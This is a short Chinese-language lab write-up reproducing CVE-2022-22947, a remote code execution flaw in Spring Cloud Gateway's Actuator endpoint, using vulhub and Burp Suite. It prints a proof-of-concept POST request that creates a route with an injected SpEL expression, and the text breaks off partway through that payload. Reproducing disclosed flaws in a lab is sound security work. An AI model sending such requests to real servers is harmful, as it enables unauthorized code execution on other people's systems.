CVE-2022-22947 Spring Cloud Gateway RCE 复现

CVE-2022-22947 Spring Cloud Gateway RCE

Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求
通过vulhub 复现

利用burpsuite进行抓包改包
1.构造含有恶意请求的路由
输入以下poc
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
“id”: “hacktest”,
“filters”: [{
“name”: “AddResponseHeader”,
“args”: {
“name”: “Result”,
“value”: “#{new String(T(org.springframew